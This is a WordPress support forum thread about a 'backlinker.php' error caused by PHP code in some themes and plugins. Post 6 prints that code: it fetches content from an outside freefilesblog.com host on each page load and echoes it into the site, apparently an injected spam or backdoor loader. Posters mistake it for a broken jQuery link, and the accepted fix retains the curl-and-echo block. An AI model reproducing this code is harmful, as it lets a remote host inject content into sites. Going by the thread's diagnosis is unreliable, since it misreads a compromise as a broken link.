WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Help with backlinker.php / 404 Error (23 posts)

  1. ultrabantha.com
    Member
    Posted 2 years ago #

    My site is: http://ultrabantha.com/

    I'm getting this error message at the top of the page:
    "Forbidden
    You don't have permission to access /backlinker.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request."

    I tried deactivating all the plugins and that didn't help. Then I tried installing the 2011 theme, and that fixed it, but it's not what I want use. The theme I'm using is: FlexSqueeze 1.5.0 by Advantus Media, Inc.

    Any help to fix this is appreciated. Hopefully I'm posting this in the right place.

  2. pee_dee
    Member
    Posted 2 years ago #

    I just had the same problem and this solved it:

    Look in header.php inside your current theme and find this line:

    http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js

    This server is no longer able to provide the .js file linked to your theme. I found it mine at:

    http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.3.min.js

    Get a hold of the .js file (or google the heck out of the .js file you need) and point to it on your server.

  3. evansamlalo
    Member
    Posted 2 years ago #

    I am also having this same issue especially with my elegant themes.

    You don't have permission to access /backlinker.php on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache mod_qos/9.69 mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 4llw4d.freefilesblog.com Port 80

    Any help will be appreciated

    Thanks

  4. ultrabantha.com
    Member
    Posted 2 years ago #

    I also tried changing my htaccess file to 666 like this person suggested but it didn't help:

    http://www.squidoo.com/wordpress-not-found-error-fix

  5. eulamue
    Member
    Posted 2 years ago #

    Everyone who is having this issue seems to be running a site that has their jquery JavaScript hosted at freefilesblog.com. freefilesblog.com has locked the file for access, though. Most likely, you have this reference somewhere in the code of the header.php file for your theme:
    "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js"

    jquery.com has the newest version of the jquery JavaScript for download, and several free hosted locations. I haven't had a chance to test it, yet, but hopefully this will lead someone else to the solution if it doesn't just work.

  6. eulamue
    Member
    Posted 2 years ago #

    SOLUTION

    I successfully got rid of the error by replacing the following non-functioning code in my header.php:

    <?php
    if(function_exists('curl_init'))
    {
     $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
     $ch = curl_init();
     $timeout = 5;
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
     $data = curl_exec($ch);
     curl_close($ch);
     echo "$data";
    }
    ?>

    With this functioning call:

    <script src="http://code.jquery.com/jquery-1.7.1.min.js" type="text/javascript"></script>
    <?php
    if(function_exists('curl_init'))
    {
     $ch = curl_init();
     $timeout = 5;
     curl_setopt($ch,CURLOPT_URL,$url);
     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
     $data = curl_exec($ch);
     curl_close($ch);
     echo "$data";
    }
    ?>
  7. photographer
    Member
    Posted 2 years ago #

    Same here, my website was working fine, suddenly today got this weird error.

  8. peklund
    Member
    Posted 2 years ago #

    eulamue! Halleluja! Tnx, it worked.

  9. alstephen
    Member
    Posted 2 years ago #

    Hi,

    I had the same issue - I installed a fresh copy of 3.3 on my local Mac and it freaked me out, namely because when I upgraded from 3.2.1 to 3.3 on another local instance I didn't see it.

    The fix eulamue posted fixed my problem. Just wanted to pass my findings so others will know it works.

  10. ultrabantha.com
    Member
    Posted 2 years ago #

    @eulamue

    I just tried your solution and it WORKED for me too! THANK YOU!!

  11. photographer
    Member
    Posted 2 years ago #

    @eulamue

    :-) YES!
    thank you!

  12. hereiamlive
    Member
    Posted 2 years ago #

    I hate to be the only idiot out there, but I checked my header.php file in both the themes I have downloaded and I cannot find that code at all. The problem is my site now takes forever to load and says waiting on freefilesblog.com so I know it is there somewhere just cannot find the code
    My header file is pretty short about a page and a half or less. I am pretty sure I am not just missing it
    Any ideas?

  13. base007
    Member
    Posted 2 years ago #

    hereiamlive, the code may also reside in a plugin you use. If you can't find it in the header of your theme, then check through your plugins.

  14. base007
    Member
    Posted 2 years ago #

    ...Forgot to mention, especially plugins you get from a source other than WordPress.org

  15. mlmnewsblog
    Member
    Posted 2 years ago #

    thanks 'eulamue'

    It worked...by changing the code given by USER:eulamue worked for me...

    Thanks mate...

  16. valeriu
    Member
    Posted 2 years ago #

    Strange, but I cannot find that code into my header.php

    Any other place??? Or what happened??

    Val

  17. arditcaushi
    Member
    Posted 2 years ago #

    @eulamue thanks , @valeriu change it on the original file and than put it on the server, at least this is how i did it because i couldn't find it either.

  18. Vinyl Roads
    Member
    Posted 2 years ago #

    I had the same issue : an eror message which indicates this file could not be found. :

    http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js

    It's ok now ...I used the code given by eulamue.

    Thank you eulamue !

    do you know why the linen theme uses 4llw4d.freefilesblog.com to load jquery ?

    It's better to use : http://code.jquery.com/jquery-1.7.1.min.js

  19. Kenan
    Member
    Posted 2 years ago #

    Thanks eulamue!
    Solution working!

  20. kingofcups
    Member
    Posted 2 years ago #

    Having the same problems as listed above.

    I'm using a YooTheme and it doesn't appear to have a header.php file? I'm trying to audit all of the other files and can't seem to find that bit of code.

    I saw mentioned it may be found in a plugin, but doesn't seem to be the case in my situation either.

    Anyone familiar with YooThemes or their Warp Framework have any suggestions here?

  21. valeriu
    Member
    Posted 2 years ago #

    Hi!

    I had the same problem, that code wasn't on my header.php or other files. Instead, I disable all the plugins one by one, and found one that cause my problem -- I think it was related to Pinterest.

    So do this and might work...

    Val

  22. kingofcups
    Member
    Posted 2 years ago #

    Thanks @valeriu -- turns out it WAS a plugin causing the problems. Rolled back to a previous version of the SEO pack I was using and all is well now. Thanks for the tip

  23. handykiev
    Member
    Posted 2 years ago #

    Eulame, thanks! it does work.

    anybody know what this crappy file was responsible for?

    jquery-1.6.3.min.js

Topic Closed

This topic has been closed to new replies.

About this Topic